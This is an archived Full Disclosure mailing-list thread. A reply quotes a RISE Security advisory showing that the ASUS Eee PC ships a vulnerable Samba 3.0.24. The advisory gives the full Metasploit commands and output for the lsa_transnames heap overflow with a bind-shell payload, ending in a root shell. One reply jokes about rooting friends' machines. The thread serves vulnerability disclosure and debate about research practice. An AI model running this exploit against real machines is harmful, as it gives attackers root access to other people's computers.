Full Disclosure mailing list archives
Re: ASUS Eee PC rooted out of the box
From: "Erik Harrison" <eharrison () gmail com>
Date: Fri, 8 Feb 2008 16:15:58 -0500
Who cares? Of all the information posted on this list each and every day, you choose this to whine about? Is there no value in knowing that this particular system has a remote-root exploit out of the box? I find this information more valuable than the thousands of SQL injection advisories for tiny software apps who have only ever been downloaded from SF 16 times. Chances are, this is likely more of a real problem that I'm to encounter in my life. The claim that this is 'media hyped' is a bit ridiculous. If this were written for that audience, we probably wouldn't be reading raw process lists or metasploit output. Though I would certainly enjoy seeing this republished in some major newspaper tomorrow, if only to force/embarrass the vendor into patching the default image for these machines when they're shipped - like they should be doing anyway. Is there anything wrong with that? So, thank you for posting this advisory. While technically it's no new information, not a new exploit, I appreciate knowing that I can visit my friends homes and root their boxes while they order pizza wirelessly on their couch. On Feb 8, 2008 3:29 PM, reepex <reepex () gmail com> wrote:
yes and no where in here includes 'make some media hyped report & blog crap for 5 minutes of fame' On Feb 8, 2008 2:27 PM, <keith () securitynow us> wrote:Security research should go as follows, run some type of scanner to findknown issues (low hanging fruit). Use your skill to manually try to find threats then manually create an exploit then report the issue after verified.-----Original Message----- From: reepex <reepex () gmail com> Sent: Friday, February 8, 2008 2:38pm To: RISE Security <advisories () risesecurity org>,full-disclosure () lists grok org ukSubject: Re: [Full-disclosure] ASUS Eee PC rooted out of the box _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/So you ran metasploitand then made a blog post. Is this what 'securityresearch' is considered now? And why did you write this is such a media hyped way? Trying to get some spotlight? On Feb 8, 2008 10:47 AM, RISE Security <advisories () risesecurity org>wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1We recently acquired an ASUS Eee PC (if you want to know more about it, a lot of reviews are available on internet). The first thing we did when we put our hands at the ASUS Eee PC was to test its security. The ASUS Eee PC comes with a customized version of Xandros operating system installed, and some other bundled software like Mozilla Firefox, Pidgin, Skype and OpenOffice.org. Analysing the running processes of the ASUS Eee PC, the first thing that caught our attention was the running smbd process (the sshd daemon was started by us, and is not enabled by default). eeepc-rise:/root> ps -e PID TTY TIME CMD 1 ? 00:00:00 fastinit 2 ? 00:00:00 ksoftirqd/0 3 ? 00:00:00 events/0 4 ? 00:00:00 khelper 5 ? 00:00:00 kthread 25 ? 00:00:00 kblockd/0 26 ? 00:00:00 kacpid 128 ? 00:00:00 ata/0 129 ? 00:00:00 ata_aux 130 ? 00:00:00 kseriod 148 ? 00:00:00 pdflush 149 ? 00:00:00 pdflush 150 ? 00:00:00 kswapd0 151 ? 00:00:00 aio/0 152 ? 00:00:00 unionfs_siod/0 778 ? 00:00:00 scsi_eh_0 779 ? 00:00:00 scsi_eh_1 799 ? 00:00:00 kpsmoused 819 ? 00:00:00 kjournald 855 ? 00:00:00 fastinit 857 ? 00:00:00 sh 858 ? 00:00:00 su 859 tty3 00:00:00 getty 862 ? 00:00:00 startx 880 ? 00:00:00 xinit 881 tty2 00:00:06 Xorg 890 ? 00:00:00 udevd 952 ? 00:00:00 ksuspend_usbd 953 ? 00:00:00 khubd 1002 ? 00:00:00 acpid 1027 ? 00:00:00 pciehpd_event 1055 ? 00:00:00 ifplugd 1101 ? 00:00:00 scsi_eh_2 1102 ? 00:00:00 usb-storage 1151 ? 00:00:00 icewm 1185 ? 00:00:01 AsusLauncher 1186 ? 00:00:00 icewmtray 1188 ? 00:00:01 powermonitor 1190 ? 00:00:00 minimixer 1191 ? 00:00:00 networkmonitor 1192 ? 00:00:00 wapmonitor 1193 ? 00:00:00 x-session-manag 1195 ? 00:00:00 x-session-manag 1200 ? 00:00:00 x-session-manag 1201 ? 00:00:00 dispwatch 1217 ? 00:00:00 cupsd 1224 ? 00:00:00 usbstorageapple 1234 ? 00:00:00 kondemand/0 1240 ? 00:00:00 portmap 1248 ? 00:00:00 keyboardstatus 1272 ? 00:00:00 memd 1279 ? 00:00:00 scim-helper-man 1280 ? 00:00:00 scim-panel-gtk 1282 ? 00:00:00 scim-launcher 1297 ? 00:00:00 netserv 1331 ? 00:00:00 asusosd 1476 ? 00:00:00 xandrosncs-agen 1775 ? 00:00:00 dhclient3 2002 ? 00:00:00 nmbd 2004 ? 00:00:00 smbd 2005 ? 00:00:00 smbd 2322 ? 00:00:00 sshd 2345 ? 00:00:00 sshd 2356 pts/0 00:00:00 bash 2362 pts/0 00:00:00 ps eeepc-rise:/root> Retrieving the the smbd version, we discovered that it runs a vulnerable version of Samba (Samba lsa_io_trans_names Heap Overflow), which exploit we published earlier last year. eeepc-rise:/root> smbd --version Version 3.0.24 eeepc-rise:/root> With this information, we ran our exploit against the ASUS Eee PC using the Debian/Ubuntu target (Xandros is based on Corel Linux, which is Debian based). msf > use linux/samba/lsa_transnames_heap msf exploit(lsa_transnames_heap) > set RHOST 192.168.50.10 RHOST => 192.168.50.10 msf exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/shell_bind_tcp PAYLOAD => linux/x86/shell_bind_tcp msf exploit(lsa_transnames_heap) > show targets Exploit targets: Id Name -- ---- 0 Linux vsyscall 1 Linux Heap Brute Force (Debian/Ubuntu) 2 Linux Heap Brute Force (Gentoo) 3 Linux Heap Brute Force (Mandriva) 4 Linux Heap Brute Force (RHEL/CentOS) 5 Linux Heap Brute Force (SUSE) 6 Linux Heap Brute Force (Slackware) 7 DEBUG msf exploit(lsa_transnames_heap) > set TARGET 1 TARGET => 1 msf exploit(lsa_transnames_heap) > exploit [*] Started bind handler [*] Creating nop sled.... ... [*] Trying to exploit Samba with address 0x08415000... [*] Connecting to the SMB service... [*] Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ... [*] Bound to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.50.10[\lsarpc] ... [*] Calling the vulnerable function... [+] Server did not respond, this is expected [*] Command shell session 1 opened (192.168.50.201:33694 -> 192.168.50.10:4444) msf exploit(lsa_transnames_heap) > sessions -i 1 [*] Starting interaction with 1... uname -a Linux eeepc-rise 2.6.21.4-eeepc #21 Sat Oct 13 12:14:03 EDT 2007 i686 GNU/Linux id uid=0(root) gid=0(root) egid=65534(nogroup) groups=65534(nogroup) Easy to learn, Easy to work, Easy to root. The original blog post and more information can be found in our website at http://risesecurity.org/. Best regards, RISE Security-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.6 (GNU/Linux)iD8DBQFHrIeHhFjK78TGSUERAvq7AJ9iz2sHD4/cQ0CdlCC1axNiVhwmJwCfddEd 6tg6XRBCWHfPWFrSdVKu5oA= =OFwe -----END PGP SIGNATURE----- _______________________________________________Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: ASUS Eee PC rooted out of the box, (continued)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Stack Smasher (Feb 08)
- Re: ASUS Eee PC rooted out of the box A . L . M . Buxey (Feb 08)
- Re: ASUS Eee PC rooted out of the box Stack Smasher (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Tonu Samuel (Feb 14)
- Re: ASUS Eee PC rooted out of the box Stack Smasher (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box RISE Security (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Erik Harrison (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Erik Harrison (Feb 08)
- Re: ASUS Eee PC rooted out of the box Simon Smith (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 08)
- Re: ASUS Eee PC rooted out of the box Simon Smith (Feb 08)
- Re: ASUS Eee PC rooted out of the box reepex (Feb 09)
- Re: ASUS Eee PC rooted out of the box Simon Smith (Feb 09)
- Re: ASUS Eee PC rooted out of the box Static Rez (Feb 09)